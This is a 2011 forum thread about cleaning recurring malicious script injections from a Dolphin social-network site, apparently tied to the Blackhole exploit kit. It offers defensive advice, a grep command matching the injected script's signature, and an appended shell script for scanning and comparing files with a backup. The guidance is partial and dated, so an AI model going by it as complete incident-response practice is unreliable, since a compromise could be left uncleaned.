Virus injections into my html

How can I stop virus injections into my HTML files? I am removing these daily with my Boonex product, only there has to be a way to prevent this blackhole toolkit.

 

Below is what keeps getting injected 

 


 

Quote · 28 Sep 2011

This website comes up as a multiple threat when opened..... Beware....

Quote · 28 Sep 2011

I am aware of the threats and I am manually removing them, but I keep getting re-injected with this crap!

Quote · 28 Sep 2011

I am answering this as a web developer, not an expert on Dolphin, (actually just signed up a few days ago).  Having had numerous clients call me to take care of this same issue on a number of different web applications, I've had some experience.  Although I am not a Dolphin expert, I can give you some basic guidelines.  A lot depends on your knowledge level tho....so you might have to get a web developer to assist you with this.

The fact that you are having to remove it every day, says that they have a script on your server, which is constantly injecting the malicious code.  Follow the steps below:

1.  Download an ftp program.  Google FileZilla.  It's free, and available for both mac and pc

2.  If you haven't installed any mods recently, you will see older dates in the ftp program, from when you installed Dolphin, or when you installed any mods.  If you look through all the files and folders, you will most likely see a date for files that were modified when you began having this issue.  This is a good place to start to see where the problem is.

3.  Using FileZilla, download a complete copy of all files in your root directory.

4.  I am assuming you have a complete backup of all your files.  Use a program like DiffMerge (google it, it's free) to compare the files you download from the server, with your backup.  This will show you where the malicious code is.

5.  Once you have either removed the malicious code, or wiped out the server and restored your site from a backup, IMMEDIATELY contact your hosting company and get your password, including your ftp password changed.

6.  Also, ask your host if there are any glaring security holes that you currently have.  You should make sure the server settings match the recommended Dolphin settings.  The hosting company won't actually be willing to look at the Dolphin code, but they might be able to tell you any hosting settings that were a problem.

7.  Once everything is done and working properly.  BACK UP ALL FILES!!!  Only after you have verified that everything works properly, and have backed up all files, then make sure you have upgraded to the latest Dolphin release.  Normally, security holes are fixed in each release. 

8.  Do a lot of googling for all mods you have, using the words hack, security, etc.  Try to see if other people have experienced hackings based on mods.  Also make sure all your mods are up to date.

9.  Change the backend password for Dolphin.

Like I said, I am just starting to learn about Dolphin, but these are typical fixes for any database-driven site that has been hacked.

Quote · 28 Sep 2011

Almost forgot....

YOU MUST TAKE DOWN THIS SITE until you get these problems resolved.  This is some REALLY nasty stuff.

Quote · 28 Sep 2011

I will get it clean, while it is running....  I have it isolated right now!

Quote · 29 Sep 2011

Also, check your local computer (the one you use to edit files and access FTP) for viruses.

Quote · 29 Sep 2011

I have all the systems clean and all the websites are clean but this one!

Quote · 29 Sep 2011

I just helped someone else here clean their site about 4 days ago that had the same infection. Two things we figured out:

 

1. The hacker had gotten their ftp password through a virus on their home computer. Malwarebytes found it and cleaned it.

 

2. The hacker had set up their own FTP account in cPanel.

 

So install Malwarebytes and make sure your home PC is clean. Then log in to cPanel and make sure you don't have extra FTP accounts. Then change your master cPanel account password too. After you make sure all the files are clean it shouldn't happen again if you do all these steps.

 

If you have shell access here is an easy command to type in that will list all the infected files:

grep -l -r "<script>String.prototype.test" *

BoonEx Certified Host: Zarconia.net - Fully Supported Shared and Dedicated for Dolphin
Quote · 29 Sep 2011
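
The two checks suggested in this thread, searching for the injected script's opening string and comparing the site against a known-good backup, as an added shell example (not part of any post above). The function names and the script name are made up for illustration; it assumes a POSIX shell with `grep -r`, `find` and `cmp` on the host.

```shell
#!/bin/sh
# Added example: two read-only checks for a site that keeps getting re-infected.
# Function names are illustrative; file names containing newlines are not handled.

# Marker taken from the grep command quoted in the thread.
SIGNATURE='String.prototype.test'

# scan_signature DIR [MARKER]
# Lists files under DIR that contain MARKER as a fixed string (-F), so "."
# is not read as a regex wildcard. Starting from DIR instead of "*" also
# covers top-level dotfiles such as .htaccess, which the shell glob skips.
scan_signature() {
    # grep exits 1 when nothing matches; that is not an error here.
    grep -rlF -- "${2:-$SIGNATURE}" "$1" 2>/dev/null | sort || true
}

# compare_trees BACKUP LIVE
# Byte-compares every file instead of trusting modification times, which
# anyone with write access to the files can reset.
# Prints "ADDED path" (only in LIVE), "CHANGED path" or "REMOVED path".
compare_trees() {
    backup=$1 live=$2
    (cd "$live" && find . -type f) | sort | while IFS= read -r f; do
        if [ ! -f "$backup/$f" ]; then
            printf 'ADDED %s\n' "$f"
        elif ! cmp -s "$backup/$f" "$live/$f"; then
            printf 'CHANGED %s\n' "$f"
        fi
    done
    (cd "$backup" && find . -type f) | sort | while IFS= read -r f; do
        [ -f "$live/$f" ] || printf 'REMOVED %s\n' "$f"
    done
}

# Usage (script name is hypothetical): sh triage.sh LIVE_DIR BACKUP_DIR
if [ "$#" -eq 2 ]; then
    scan_signature "$1"
    compare_trees "$2" "$1"
fi
```

`ADDED` lines are files the backup never had, so they are the first place to look for a script that keeps re-injecting the code; `CHANGED` lines catch injected files even when the script's opening string has been altered.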

Who on earth would want to hack Dolphin sites? I know there are a few weird users on here... but it's hardly Facebook or the Pentagon, is it....

Quote · 29 Sep 2011

I am not showing anything on the search, but AVG is still saying it is there, and another malware search as well!

Any suggestions?

Quote · 29 Sep 2011
 
 